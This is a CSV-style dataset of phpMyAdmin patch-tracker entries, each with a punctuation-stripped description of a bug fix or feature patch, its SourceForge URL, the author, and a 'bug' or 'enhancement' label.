This involved the following changes libraries\common.lib.php merge the URL parameters if necessary libraries\tbl links.inc.php set the table parameter to NULL in the DROP TABLE link Original URL https sourceforge.net p phpmyadmin patches 505 Original author kaarelnu","bug"
"24444","4454","XML export wrongly encoded.
Trying to export to XML we have a porblem with function utf8 encode ) that exist in file libraries export xml.php on line 340.
All data in russian utf8 or cp1251, no matter) looks like xc3x90xc2x93xc3x90xc2xbbxc3x90xc2xb0xc3x90xc2xb2xc3x90xc2xbdxc3x90xc2xb0xc3x91xc2x8f.
If we will change this line buffer .= lt;column name= .
columns[ i] .
gt; .
htmlspecialchars utf8 encode string) record[ i])) To this one buffer .= lt;column name= .
columns[ i] .
gt; .
htmlspecialchars string) record[ i]) The problem is gone.
Original URL https sourceforge.net p phpmyadmin patches 506 Original author hanut","bug"
"24444","4455","Single row deletion with AJAX.
AJAXifying PMA will be a big boost to the existing interface.
JQuery is probably the way to go.
Original URL https sourceforge.net p phpmyadmin patches 507 Original author meheranandk","bug"
"24444","4456","Links in information schema for easier column editing.
Added links to the information schema table as outlined here http sourceforge.net tracker ?func=detail aid=2950664 group id=23067 atid=377411 Also added a compare link for all columns to allow for easier editing of columns across different databases.
Original URL https sourceforge.net p phpmyadmin patches 508 Original author movicont","bug"
"24444","4457","Title out of box when showing table size.
Title of the table in PDF schema would get off the table box if the show the table size option would be on and no long field names would be present.
This patch fixes it.
It was quite tricky tho, because the width of the table needs to be known in order to determine the width of the table.
Original URL https sourceforge.net p phpmyadmin patches 509 Original author blinkys","bug"
"24444","4458","More informative error message.
When a user tries to insert a field of type CHAR VARCHAR BIT VARBINARY BINARY and enters a value in the Length Values field that is not a number, an alert is displayed that says This is not a number!
and places the cursor in that field.
However, some users might not realize which field is the offending one Google this is not a number phpmyadmin and you will find many results).
This patch changes the error message to Check value in field lt;property name gt; This is not a number!
Original URL https sourceforge.net p phpmyadmin patches 550 Original author teekirol","bug"
"24444","4459","Private var access in PDF Schema.
Private variables are being accessed when Show Grid option is on in PDF Schema page.
Original URL https sourceforge.net p phpmyadmin patches 510 Original author blinkys","bug"
"24444","4460","Check table under database operations page.
Added a check table for all tables on the database operations page as specified in this request https sourceforge.net tracker ?func=detail aid=2977470 group id=23067 atid=377411).
Built it as a mootools slider that only opens if more than one table will be affected.
The number in parens is the number of affected tables.
Original URL https sourceforge.net p phpmyadmin patches 511 Original author movicont","bug"
"24444","4461","Documentation FAQ 7.2 translation additions.
This adds a section about documentation translation.
The text was taken from the PMA website.
Original URL https sourceforge.net p phpmyadmin patches 555 Original author ibennetch","bug"
"24444","4462","Fixes bug 2960105.
This patch allows for all Unicode characters to be imported from an ODS file.
Original URL https sourceforge.net p phpmyadmin patches 512 Original author nmrugg","bug"
"24444","4463","Patch for Use inline query editing ID 2804874.
Use inline query editing ID 2804874 Original URL https sourceforge.net p phpmyadmin patches 513 Original author hiddenpearls","bug"
"24444","4464","Navigation frame styling.
A few fixes to navigation frame icon background home, log out, ...) on mouse over now fills entire box icon border changed from 0.05em to 1px, fixes display on Chrome it was rounded to 0) redesigned fast filter, resizes correctly with frame, reset button is better aligned decreased margin on database tree see screenshot) fixed list margin for RTL languages that list is always in ltr so my change works) Original URL https sourceforge.net p phpmyadmin patches 514 Original author crackpl","bug"
"24444","4465","External authentication via link.
Hello ; First, I don t know if the bug traker is good place to provide so, sorry if I m wrong.
I ve coded a little script for our panel ispCP) that allow external authentication for PMA.
Note that is not SSO.
To understand the goal of this script, imagine you have a small application that allow you to create some databases with login credentials stored in your application database and then, from your application, you want provide a link to the user for direct PMA authentication.
This script is based on PMA cookies authentication.
Maybe this script can be part of the Contrib.
If you want, I can provide version more generic configurable.
What do you think about it ?
Note Sorry for my poor English, I m French.
Original URL https sourceforge.net p phpmyadmin patches 559 Original author nuxwin","bug"
"24444","4466","Uniform look for tabs in major browsers.
Changes some styles for tabs changed em margins paddings to px to avoid rounding errors on mouse over tabs no longer move in Opera and Chrome, margin between icon and caption stays constant in Forefox and IE) added border radius for Firefox Original URL https sourceforge.net p phpmyadmin patches 515 Original author crackpl","bug"
"24444","4467","Tables maintenance for entire DB ID 2977470.
This patch adds a block Tables maintenance to Operations tab when DB is selected.
Block Tables maintenance contains Check table, Defragment table, Analyze table, Repair table, Optimize table and Flush the table FLUSH ).
For each item inside block, this counts how many tables in DB have type that support it.
If none hide item, else show number of tables that will be affected by operation, in brackets.
Original URL https sourceforge.net p phpmyadmin patches 516 Original author madhuracj","bug"
"24444","4468","Disable field type column in data insert edit .
Patch for rfe 2935599 Disable field type column in data insert edit formular.
http sourceforge.net tracker ?func=detail aid=2935599 group id=23067 atid=377411 This patch will display the field type column in the data insert edit page if cfg[ ShowFieldTypesInDataEditView ] is either true or not set.
Original URL https sourceforge.net p phpmyadmin patches 517 Original author bhdouglass","bug"
"24444","4469","Paginate SQL Query results with AJAX.
Proof of concept to show that jQuery can be used to paginate the results of any SQL query executed on a table.
Not a thoroughly tested patch.
The paginate table.js attaches actions to the navigation form and carries out the AJAX request, inserts the newly retrieved contents into the page.
PHP code in sql.php has been modified accordingly and only the necessary contents are printed whenever an AJAX request is made.
Original URL https sourceforge.net p phpmyadmin patches 518 Original author ninadsp","bug"
"24444","4470","Left panel table grouping incorrect.
1\.
Set LeftFrameTableSeparator = , LeftFrameTableLevel = 10 2\.
CREATE TABLE test a b c a int); Left pane shows table with no name and incorect link href.
Patch fixes this.
Original URL https sourceforge.net p phpmyadmin patches 567 Original author anonymous","bug"
"24444","4471","Use jQuery to bind click events on checkboxes.
The traditional way of binding events to html elements is to set its onxxx attributes to your piece of js code.
This poses a problem since only one event handler can be bound at the same time.
This is currently not an issue with phpmyadmin itself, but user scripts greasemonkey) or browser extensions may rely on binding additional events to elements.
see http sourceforge.net tracker ?func=detail aid=2717117 group id=23067 atid=377408 ) With this patch the jQuery event management is used to bind the one event that is pointed out in the issue.
It installs a list of events that allows for expansion.
Original URL https sourceforge.net p phpmyadmin patches 520 Original author bananer","bug"
"24444","4472","Remove Mootools.
Looking at the browsers javascript object graph it seems to me that mootools is not used anywhere anymore).
I also tried some search terms on the codebase and could not find any uses of the mootools library.
I removed mootools from common.inc.php and did some basic UI tests, where everything worked fine.
I come to the conclusion that mootools is not used anymore and suggests its removal and the continued use of jQuery, which pretty much does the same things.
Original URL https sourceforge.net p phpmyadmin patches 521 Original author bananer","bug"
"24444","4473","patch for rfe 2958013. patch for rfe 2958013 Original URL https sourceforge.net p phpmyadmin patches 522 Original author biran0079","bug"
"24444","4474","LeftFrameTableSeparator should not group with one.
This patch is for this bug https sourceforge.net tracker ?func=detail aid=2938291 group id=23067 atid=377411 When there are multiple tables in a database with the same prefix, PMA groups them together.
However, if there is only one table then there should be no grouping.
Original URL https sourceforge.net p phpmyadmin patches 523 Original author teekirol","bug"
"24444","4475","monitor page that automatically refreshes the sql query.
i created a simple page, that is useful for admins.
you can just copy it in any location and use it to monitor a certain sql query Original URL https sourceforge.net p phpmyadmin patches 525 Original author rubo77","bug"
"24444","4476","Slider hides page footer on table structure bug 2983050).
Fixes bug Slider hides page footer on table structure ID 2983050 Adds missing lt; div gt; element Adds anchor tablestatistics Changes inline css style of lt;table id= tablestatistics gt; Original URL https sourceforge.net p phpmyadmin patches 526 Original author stroxler","bug"
"24444","4477","in the Sync tab allows Sync D both simultaneously.
Fixes bug Sync S D only S ID 2981127 If a table is not in the target db and I ask to synchronize Structure and D ata, only Structure is done.
Then I come back and ask for D and it works.
done small changes server synchronization.lib file in the function PMA populateTargetTables to remove my sql error Commands out of sync; you can t run this command now in mysql php .
Original URL https sourceforge.net p phpmyadmin patches 527 Original author ankitgupta3","bug"
"24444","4478","Porting setup from mootools to jQuery.
I have starting tackling pma s dependency on mootools and re did most of the setup s scripts.
Without the mootools.js embedded the tab navigation already works fine and validation of the fields works somewhat.
I m pushing this to http repo.or.cz w phpmyadmin bananer.git Original URL https sourceforge.net p phpmyadmin patches 528 Original author bananer","bug"
"24444","4479","Fixed inappropriate changing state.
Do not change table row state css class marked) when clicked on an anchor or inside a form element in in line editing mode.
Original URL https sourceforge.net p phpmyadmin patches 580 Original author pracj3am","bug"
"24444","4480","Validate manual date time input.
I m using phpMyAdmin for last few years and i have modified few things in order to make things easy for me.
This year i would like to participate in gsoc as well.
I would like to share those improvements if it is useful for everyone who uses phpMyAdmin.
When entering date time value in the textbox if the user enters some invalid values mistakenly no errors thrown.
When we are executing the insert update the error is shown as mysql sql error, which takes too much time of the users when they make mistakes.
Therefore what i did with my phpMyAdmin is that, when enters the date time manually it will validate using javascript and show the error instantly.
Therefore it saves more time and improve the phpmyadmin interface as well.
In future validating the necessary fields using javascript will provide an easy and speedy access to all the users.
I have attached the modified file that I m using now and hope it will be useful for others as well.it also can be enhanced more.. Its just my opinion.
If it is wrong please kindly forgive me.
Thank you Original URL https sourceforge.net p phpmyadmin patches 530 Original author sutharshan02","enhancement"
"24444","4481","Ajaxify browse delete criteria in DB search.
Modified the Browse criteria and delete criteria of database search to loads in the same window of the search results load.
Original URL https sourceforge.net p phpmyadmin patches 584 Original author anonymous","bug"
"24444","4482","Porting MooTools to jQuery in setup.
Removed all MooTools code from setup script and ported it to jQuery.
I see we have another patch for this, but I had it already finished and just didn t have an internet connection today.
Maybe that other patch s author would take mine and merge our work eg.
use my HTTP POST requests for AJAX instead of HTTP GET).
Original URL https sourceforge.net p phpmyadmin patches 531 Original author crackpl","bug"
"24444","4483","Easy query builder.
I have added some small features to the sql query panel to generate sql queries in one click.
I have included the following on click queries in the sql query panel 1\.
select all 2\.
select based on columns) 3\.
insert 4\.
update 5\.
delete Its works fine and this buttons are active only when the sql query panel accessed for single table.
For the general query window its not visible.
I hope it would be a useful implementation for pma.
The following two modified files are attached below 1\.
functions.js new function insertQuery ) was added.
other functions are not edited) js functions.js 2\.
sql query form.lib.php new buttons are added with some php codes ) libraries sql query form.lib.php TO DO Even though it works well and provide quick access for beginners in sql, its only available in english at the moment.
Language pack have to be updated new parameter should be added to them such as strUpdate, strDelete, strSelectAll.
Once they have added, the sql query form.lib.php file must be edited to change the button values to work with the language pack.
Please provide your feedbacks.
Thank you Original URL https sourceforge.net p phpmyadmin patches 532 Original author sutharshan02","bug"
"24444","4484","Server variable documentation link in variables.
Server variable documentation link in server variables.php ID 3196075 I created server variables doc.php to store the information of the variables in a array VARIABLE DOC LINKS[ variable name ] which holds an array of the variable id, variable group and variable type.
This values are calculated and passed on PMA showMySQLDocu ) to generate the url and stored in doclink[ variable name ] Original URL https sourceforge.net p phpmyadmin patches 591 Original author srajbr","bug"
"24444","4485","Patch for TCPDF.
This patch relates to the feature request ID 2982568.
This stops TCPDF from emitting warnings.
Original URL https sourceforge.net p phpmyadmin patches 533 Original author dinithi","bug"
"24444","4486","Patch for default export settings bug 2983446.
Modified file was attached below.
I think the problem caused because the init options ) was called early before the page loads all the elements.
Therefore the init options ) function was now called after page loads by using window.onload event In display export.lib.php at line 101 modify the code as below lt;script type= text javascript gt; lt;!
[CDATA[ window.onload=init options; previously it was inti options ); ]] gt; lt; script gt; Now its works fine for me.
Hope it is useful.
thank you Original URL https sourceforge.net p phpmyadmin patches 534 Original author sutharshan02","bug"
"24444","4487","Patch for bug ID 2983056.
InnoDB storage page emits warning.
Warning in .
libraries common.lib.php 1501 number format ) expects parameter 1 to be double, string given Original URL https sourceforge.net p phpmyadmin patches 535 Original author madhuracj","bug"
"24444","4488","Patch for bug ID 2983053.
PBXT storage overview emits warning.
Notice in .
libraries common.lib.php 1438 A non well formed numeric value encountered Original URL https sourceforge.net p phpmyadmin patches 536 Original author madhuracj","bug"
"24444","4489","Patch for warnings in InnoDB page.
This patch relates to the bug ID 2983056.
Original URL https sourceforge.net p phpmyadmin patches 537 Original author madhuracj","bug"
"24444","4490","Patch for warnings in PBXT storage overview page.
As the type of pbxt transaction buffer size given as PMA ENGINE DETAILS TYPE SIZE it is directed to PMA formatByteDown ) function to do the necessary formatting.
But since the value is already formatted Eg 1MB), PMA formatByteDown ) gives an error.
As the value is already formatted we can make its type PMA ENGINE DETAILS TYPE PLAINTEXT and simply append the value, not sending it to the PMA formatByteDown ) function.
Original URL https sourceforge.net p phpmyadmin patches 538 Original author madhuracj","bug"
"24444","4491","Patch for bug 2983053 PBXT warning).
This patch corrects the warnings by taking in account the unit, trying to convert it to an i less one for example MiB gt; MB) because PBXT returns i less units, and if still nothing is found, returns the unit as it is.
Original URL https sourceforge.net p phpmyadmin patches 539 Original author eswiac","bug"
"24444","4492","JQuery Solution for enum set issue ID 1494550.
I have attached the patch file and the new files to be added in order to use jQuery themes and js files) This will pop up a jQuery dialog box to type the enum,set values and each values should be typed in each new line.
its very easy to use and userfriendyl since users need not to type the quotation marks, commas and so on.
Hope its usefull for all.
Original URL https sourceforge.net p phpmyadmin patches 541 Original author sutharshan02","bug"
"24444","4493","Templates Proof of concept with Dwoo GSoC).
This patch changes db structure.php so that it uses the template system Dwoo.
It is still work in progress as it just rewrites the main page but not the header and footer.
It also rewrites some small PMA functions already.
Dwoo version 1.1.1 was used for this patch.
As SF does not allow files larger than 256k I didn t include the actual Dwoo library.
You can obtain it from http dwoo.org Original URL https sourceforge.net p phpmyadmin patches 542 Original author stroxler","bug"
"24444","4494","Save and restore SQL queries.
This patch enable to save SQL queries from the SQL query box into cookies and restore them.
Included an option to delete selected stored query.
Includes an option wich alert user when leaving the page without an empty SQL query box.
Original URL https sourceforge.net p phpmyadmin patches 610 Original author bluemriine","bug"
"24444","4495","fix for the bug 2983066. fix for the bug 2983066 https sourceforge.net tracker index.php?func=detail aid=2983066 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin patches 543 Original author blinkys","bug"
"24444","4496","XML export of views.
XML View of View fails patch to rectify the xml export Original URL https sourceforge.net p phpmyadmin patches 611 Original author systemw0rm","bug"
"24444","4497","Partial fix for bug 3204461.
Please find attached a partial solution for issue 2 from bug 3204461.
The patch will bind the datepicker to the new inputs, so they will be shown.
However there are still some issues.
The newly added datepickers will work with TIMESTAMP and DATETIME columns, but only place the date part into the input.
When used on DATE columns, it will save to incorrect inputs.
Original URL https sourceforge.net p phpmyadmin patches 612 Original author roccivic1","bug"
"24444","4498","patch for designer issue ID 2983060.
I have attached the patch for the designer basic state issue.
The issue was due to the logical error.
hope its useful.
thank you.
Original URL https sourceforge.net p phpmyadmin patches 544 Original author sutharshan02","bug"
"24444","4499","Patch for datetime editor ID 2983207.
Patch for Replace datetime editor with jQuery datepicker ID 2983207 Original URL https sourceforge.net p phpmyadmin patches 545 Original author hiddenpearls","bug"
"24444","4500","Fix for warning while changing table engine.
When Maria engine is selected as the new table engine, the default values for transactional and page checksum should be set.
This patch corrects it.
Original URL https sourceforge.net p phpmyadmin patches 546 Original author madhuracj","bug"
"24444","4501","GIT Ignore non default Themes.
GIT should ignore all non default Themes.
Original URL https sourceforge.net p phpmyadmin patches 547 Original author virsacer","bug"
"24444","4502","server status.php Make suggestions for performance.
[ phpmyadmin Feature Requests 1450298 ] server status.php Make suggestions for performance https sourceforge.net tracker ?func=detail atid=377411 aid=1450298 group id=23067 Original URL https sourceforge.net p phpmyadmin patches 548 Original author rajshekhar","bug"
"24444","4503","Drizzle detection.
A few changes concerning Drizzle constant which tells whether we are working with Drizzle, detecting versions will work also in the future, devs plan to have build dates as version numbers hidden Change Password on main page as Drizzle uses auth plugins, no real auth is build into the core server made Processes, Status and Charsets tabs work correctly proper charset list building by using MySQL information schema Drizzle data dictionary I would like this patch included in 3.4 especially Drizzle detection part).
Original URL https sourceforge.net p phpmyadmin patches 622 Original author crackpl","bug"
"24444","4504","Navigation frame cleanup.
This patch removes the Databass label from the dropdown list and also removes the name of the current database in the sidebar.
It partially addresses this feature request https sourceforge.net tracker ?func=detail aid=2998130 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 549 Original author teekirol","bug"
"24444","4505","Left Frame Db Tree Formatting.
When cfg[ LeftFrameLight ] = true; cfg[ LeftFrameDBTree ] = true; cfg[ DisplayDatabasesList ] = true and one of the sub tree elements is selected, the formatting looks kind of wonky see screenshots) because I think the inner ul inherits the text align center property from the enclosing div databaseList.
Original URL https sourceforge.net p phpmyadmin patches 551 Original author teekirol","bug"
"24444","4506","[Patch] Bad table alighment for RTL languages.
Patch for Bad table alighment for RTL languages, Bugs ID 3276024 https sourceforge.net tracker ?func=detail aid=3276024 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin patches 627 Original author back2arie","bug"
"24444","4507","Setup no longer displays message to move config.
Patch for bug ID 3277503.
It also provides very simple way based on HTTP GET to send confirmation messages to user, can be used for other features that needs sending notify for user.
Original URL https sourceforge.net p phpmyadmin patches 629 Original author mlewandow","bug"
"24444","4508","Drizzle charset improvement.
Set drizzle charset and collation to utf8 rather than disable it.
Original URL https sourceforge.net p phpmyadmin patches 631 Original author back2arie","bug"
"24444","4509","Documentation misplaced comma.
FAQ 1.40 uses a comma instead of a period...
Original URL https sourceforge.net p phpmyadmin patches 552 Original author ibennetch","bug"
"24444","4510","Documentation FAQ 7.1 forum link.
Tiny improvement; link directly to the forum instead of the main sourceforge page.
Original URL https sourceforge.net p phpmyadmin patches 553 Original author ibennetch","bug"
"24444","4511","Hide Show operaor and value fields in table search page.
Due to a lot of columns availaible in a table, all of the operator and value fields are shown to users.
So at start they are hidden and can be toggled hide unhide on clicking the corresponding column line.
Original URL https sourceforge.net p phpmyadmin patches 634 Original author ayax88","bug"
"24444","4512","Documentation FAQ 7.2 cleanup.
Some cleanups for FAQ 7.2 Original URL https sourceforge.net p phpmyadmin patches 554 Original author ibennetch","bug"
"24444","4513","external script authentication.
I want improve authentication system by adding hidden layer of external authentication and obtaining proper username password to get access to mysql server.
This approach can be used against signon auth type.
External script should have function get credentials with username and password as input parametres.
This function should return real username and password for accessing mysql server.
Original URL https sourceforge.net p phpmyadmin patches 638 Original author levg89","bug"
"24444","4514","Documentation general cleanup.
I found a few places that needed cleanup plus the Synchronization FAQ was using literal utf charachters for ` and so on those are replaces with the appropriate escaped character entity or lt;code gt; blocks.
Original URL https sourceforge.net p phpmyadmin patches 556 Original author ibennetch","bug"
"24444","4515","Fix Insert ajax form generate wrong query.
This patch fix bug [0] Main cause As we increase Continue insertion with rows , script in js tbl change.js inserts new rows.
But, the new index for textarea is not regenerated.
[0] https sourceforge.net tracker ?func=detail aid=3291922 group id=23067 atid=377408 Original URL https sourceforge.net p phpmyadmin patches 641 Original author arisferyanto","bug"
"24444","4516","Fix for issue 1 from bug 3291301.
Please find attached a fix for issue 1 from bug 3291301.
The problem here is that PMA showMessage ) is called twice to show two messages once for the UPDATE query and once for the SELECT query.
And the JS selector that is used in this function targets every element with class= tools .
This obviously means that the first DIV element with class= tools is processed twice.
The solution is to force JS to only process the last matched element.
The second issue from the above mentioned bug is more complex, as some elements are generated with non unique IDs in the form in question.
I will try to fix that as well, but it s looking much more difficult... Rouslan Original URL https sourceforge.net p phpmyadmin patches 642 Original author roccivic1","bug"
"24444","4517","Fix for issue 2 from bug 3291301.
Please find a fix for issue 2 from bug 3291301 I did some basic testing of this patch and works fine.
Rouslan Original URL https sourceforge.net p phpmyadmin patches 643 Original author roccivic1","bug"
"24444","4518","Prevent sending of unnecessary cookies.
Right now phpMyAdmin sets font size and theme cookies on one page load and removes on the next one , then the cycle repeats.
1\.
no cookie, set with default falue 2\.
cookie with default value exists, remove 3\.
repeats from 1.
This patch properly prevents setting a cookie with default value.
Original URL https sourceforge.net p phpmyadmin patches 557 Original author crackpl","bug"
"24444","4519","PBMS blob streaming update.
These are patches to update the blob streaming so that it is compatible with the current version of PBMS.
I have isolated all PBMS specific code in the blobstreaming.lib.php file so in the future any changes required for compatibility will only involve updating this file.
I also added an entry in the Storage engines tab for PBMS.
I think some more testing will need to be done but any more changes required at this point are probably far easier handled by someone who is more familiar with the internal;s of phpMyAdmin than I.
Original URL https sourceforge.net p phpmyadmin patches 558 Original author barry leslie","bug"
"24444","4520","Language and grammar fixes in Documentation.html.
Language and grammar fixes in Documentation.html Original URL https sourceforge.net p phpmyadmin patches 560 Original author ibennetch","bug"
"24444","4521","JSON export, see description for details.
From https sourceforge.net tracker ?func=detail aid=3012590 group id=23067 atid=377411 all I did was grab the file from Pastebin so it wouldn t expire.
Original URL https sourceforge.net p phpmyadmin patches 561 Original author ibennetch","bug"
"24444","4522","Fix HTML for table details toggle.
Placed clear div for surrounding div to go past table area.
moved details code inside of display details conditional output.
Original URL https sourceforge.net p phpmyadmin patches 652 Original author garethop","bug"
"24444","4523","wrong variable checked for nopassword.
in mysqli.dbi.lib.php, the wrong variable was being checked for the nopassword option, so it had no effect.
Original URL https sourceforge.net p phpmyadmin patches 562 Original author wpalmer","bug"
"24444","4524","Dragging tables to the edge after page size change.
Description If you choose a larger page size, scratchboard size will be refreshed, but table box dragging will still be restricted to the area covered by the default paper size.
The same problem occurs when changing from Portrait to Landscape right border can t be reached through dragging) or vice versa bottom border can t be reached) Reproduction Open scratchboard, move a table box towards to the right and bottom border.
Dragging will stop at 2px and 5px before the border of the scratchboard.
Change paper size to a larger format eg.
from A4 to A3).
Scratchboard will expand accordingly in size, but the draggable area will remain limited to the previous dimensions.
Thus, the larger area can be used only by entering bigger coordinate values manually in the text boxes below.
An attempt to drag these elements will result in their position automatically corrected .
Cause The area inside which the draggable object can be moved around is defined once on page initialization) by calling the DOM Drag method drag.init ), but not after a change to page size or page orientation lines 536 and 542 in pdf pages.php) is made.
That is something the function refreshDragOption ) found in js functions.js, line 1382) misses.
Suggestion Regroup the init ) function in pdf pages.php Put all the lines that contain drag.init calls into a separate function that can be used by both the init ) function in pdf pages.php as well as the refreshDragOption function in js functions.js.
This new function could probably also check whether there are table boxes out of range of the scratchboard box in case a smaller page size was selected) and adjust the coordinates so that all boxes are positioned within the visible area of the scratchbox.
However, I personally would prefer to adress that issue by adding scrollbars by adding overflow auto to the scratchboard box) in case there are table boxes out of range.
A conscious user should be aware of the fact that paper sheets don t usually come with scrollbars...
I attach a file containing the changes I made to my PMA 3.3.5 installation on an up to date Debian LAMP machine.
This fix was cursorily tested with Debian Iceweasel, WinXP Firefox 3.6 and WinXP IE8 and works fine for me.
Original URL https sourceforge.net p phpmyadmin patches 563 Original author mad05","bug"
"24444","4525","Left frame table filter visibility config option.
I don t need the table filter in the left frame so I added config option to hide it.
I just do this after every update, here s what I did with the 3.3.6 source In libraries config.default.php add the following beginning from line 781 display table filter global boolean cfg[ LeftDisplayTableFilter ] cfg[ LeftDisplayTableFilter ] = TRUE; In navigation.php change row 300 to if table count GLOBALS[ cfg ][ LeftDisplayTableFilter ]) \{ To not to show the filter add this to your config.inc.php cfg[ LeftDisplayTableFilter ] = FALSE; Original URL https sourceforge.net p phpmyadmin patches 564 Original author eesau","bug"
"24444","4526","BUG 3081099 Left frame not updated patch.
Edited PMA Ajaxresponse ) in common.lib.php..added some javascript code to be sent with ajax..
Original URL https sourceforge.net p phpmyadmin patches 565 Original author systemw0rm","bug"
"24444","4527","Typo in the Doc.
I found two typo in the Documentation.
Original URL https sourceforge.net p phpmyadmin patches 657 Original author rdeq08","bug"
"24444","4528","Default function for TIMESTAMP cols.
When editing row, the UI would choose NOW function as default even if TIMESTAMP col was not empty.
This resulted in resetting the col to the current timestamp.
The patch adds test for the data when deciding whether to use default function for first timestamp or not.
The patch is against version 3.3.5 Original URL https sourceforge.net p phpmyadmin patches 566 Original author anonymous","bug"
"24444","4529","Replication bug with initial sync.
When setting up a slave and selecting Synchronize databases with master from the replication tab the database names are not quoted.
If there are databases on the master with hyphen then phpmyadmin generates an invalid query.
I found the PMA backquote ) function used elsewhere in phpmyadmin, and assume this is the standard way of quoting database table names with backticks Original URL https sourceforge.net p phpmyadmin patches 568 Original author duncan3dc","bug"
"24444","4530","Fix for bug 3313875.
The problem is that if you have more than 50 users, the Add new user link always load into the same window no ajax).
The problem is that this window does not have the generate password option.
Looking in the code, the part that only showed the link was missing the conditional class which transforms the link into a ajax window.
This patch adds that again.
Original URL https sourceforge.net p phpmyadmin patches 661 Original author middag","bug"
"24444","4531","XML plugin for database export.
BUG ID 3076692 Previously the structure schema for database was not getting exported.
Hence only the tables having some rows in it and listed in lt;database gt; section gets exported...Edited and rectified the structure schemas checkbox for XML exporting Original URL https sourceforge.net p phpmyadmin patches 569 Original author systemw0rm","bug"
"24444","4532","Tables filter was rewrited to use jquery.
I rewrited tables filer to use jquery and changed filter input field styles.
Old script lost focus in Opera after key was pressed.
And seems that new script works faster.
Original URL https sourceforge.net p phpmyadmin patches 570 Original author dylfin","bug"
"24444","4533","XML export view of view fails patch.
patch added for XML view of view fails while exporting Original URL https sourceforge.net p phpmyadmin patches 571 Original author systemw0rm","bug"
"24444","4534","Fix for bug 3353811.
Please find attached a fix for bug 3353811 as well as a screenshot that shows a before after comparison.
Original URL https sourceforge.net p phpmyadmin patches 666 Original author roccivic","bug"
"24444","4535","php array export plugin encoding fix.
The current version 3.3.8.1 0.2b) of the PHP Array export plugin has bugs that it will produce invalid output.
The attached update of the file properly encodes values , \ and are slash encoded control and characters larger 126 are hex encoded.
Original URL https sourceforge.net p phpmyadmin patches 572 Original author hakre","bug"
"24444","4536","Aria table size is printed as unknown.
The table size for Maria and Aria storage engine types are printed as unknown This happens on the current version 3.3.8.1 as well as all versions below it Only a simple code change is required.
Edit db structure.php Search for MyISAM and add a case for Aria and Maria Original URL https sourceforge.net p phpmyadmin patches 573 Original author anonymous","bug"
"24444","4537","Patch for bug 3147884 order by size desc wrong.
The error is due to the definition of Size , where size is calculated as Data length Index length) while it is sorted only by Data length .
This patch makes it sort by Data length Index length) Original URL https sourceforge.net p phpmyadmin patches 574 Original author madhuracj","bug"
"24444","4538","Changed yaml export to double quotes for strings.
I had a table with entries starting with a single quote e.g.
s middags) and a single line.
With the current implementation this was an illegal because it then expects a single quoted entry.
If it had double lines it would work.
This is because of the | starting the entry.
There are 2 possibilities to solve this issue 1\.
Let every string use the multiple line strategy 2\.
Put strings into double quotes and a single line.
I think 2 is more favorable because it better preserves the actual data.
Current implentation changes \r, \n and \r\n to the users CRLF setting in every value.
This may not be desirable.
SQL for test table CREATE TABLE `test` `name` varchar 255) NOT NULL); INSERT INTO `test` `name`) VALUES s middags ), s middags\n abc ); Original URL https sourceforge.net p phpmyadmin patches 575 Original author middag","bug"
"24444","4539","Patch for broken pagination dropdown Bug id 3151925).
URL for the Get method was missing, most probably due to the changes done while AJAXifying the PMA.
Original URL https sourceforge.net p phpmyadmin patches 576 Original author madhuracj","bug"
"24444","4540","Order by a column in a view doesn t work smtimes.
Preparation CREATE TABLE `zikula2`.`sometable` `a` INT NOT NULL , `b` INT NOT NULL ); insert into sometable VALUES 1,2), 1,2), 2,3), 2,1) create view someview as select a,avg b) from sometable; Now issue SELECT FROM `someview` and then click on the second column to order it gt; SQL error, since the column name is not backquoted.
Original URL https sourceforge.net p phpmyadmin patches 675 Original author csware","bug"
"24444","4541","Patch for column header misalignment.
This patch fixes the misalignment of columns headers that can be set to appear within long list of query results.
Original URL https sourceforge.net p phpmyadmin patches 577 Original author madhuracj","bug"
"24444","4542","Wrong format returned by datepicker.
This patch resolves the bug reported in Bug ID 3156378 Original URL https sourceforge.net p phpmyadmin patches 578 Original author madhuracj","bug"
"24444","4543","Added the show hide criteria for DB Search.
Added the link to show and hide the search criteria in the database search result window.
The changes were done to the js db search.js file.
Original URL https sourceforge.net p phpmyadmin patches 579 Original author anonymous","bug"
"24444","4544","Fixed changing top menu items outer width.
Top menu items margins and paddings converted to absolute units to prevent changing outer width on hover.
This problem occurs at least in Chrome 8 on Linux) and I think it is because of internal rounding of the relative units to pixels.
Original URL https sourceforge.net p phpmyadmin patches 581 Original author pracj3am","bug"
"24444","4545","Add direct link to copy row of the displayed table.
Simplified process of table row copying.
Direct link has been added to each table row, after editing the row will be inserted as a new one.
I have done some tests on many of my tables, but some further testing would be suitable.
Original URL https sourceforge.net p phpmyadmin patches 582 Original author pracj3am","bug"
"24444","4546","Fix ajax dropping multiple column index.
This patch fixes bug that only first column is hidden when dropping multiple column index using AJAX.
Original URL https sourceforge.net p phpmyadmin patches 583 Original author pracj3am","bug"
"24444","4547","Decentralisation of alter table code.
It would be nice to break out some code from Table.class.php, I thought, so the generation of alter table statements is now placed in another place where it is used, in the from tbl alter.php used class alter table sql generator.
This concept of decentralization will make Table.class.php thinner of functionality.
Continuing to break out functionality from Table.class.php will sooner or later make it a data class instead of a class with a lot of responsibilities.
I wanted to break out this code so that it will be easier then to add some functionatliy that makes it possible to rename fields that you normally cannot rename because of relations and indexes being in the way.
As it is now, if a user is trying to rename a field that cannot be renamed without removing a lot of relations and indexes, the user will get a cryptic error message instead of a controlled one).
If a field has a relation from another table to it, then it cannot be renamed.
If a field has one or more indexes, it cannot be renamed.
Those limitations are of course MySQL s limitations.
If we want to write functionality that anyhow addresses the problem of renaming fields that MySQL not lightly want us to rename, we will need to put up a list in front of the user with the operations that are needed to rename the field and let the user press ok , then the user will see the operations being done one by one.
Such operations can be remove relation, remove index, add relation, add index, in the end restoring indexes, auto increment and relations.
Original URL https sourceforge.net p phpmyadmin patches 683 Original author anderslinden2","enhancement"
"24444","4548","Minor improvements to documentation.
Just two lines reworded...
Original URL https sourceforge.net p phpmyadmin patches 684 Original author ibennetch","bug"
"24444","4549","Fixing failing unit tests.
Here is the initial patch for bug ID 3170421.
Still there are failing tests and I tried to get them work.
Can you please check and add your comments?
Original URL https sourceforge.net p phpmyadmin patches 585 Original author kasunlak","bug"
"24444","4550","Sorting BLOB displaying the content.
Sorting by BLOB displays raw data in the header.
This is patched by using PMA handle non printable contents ).
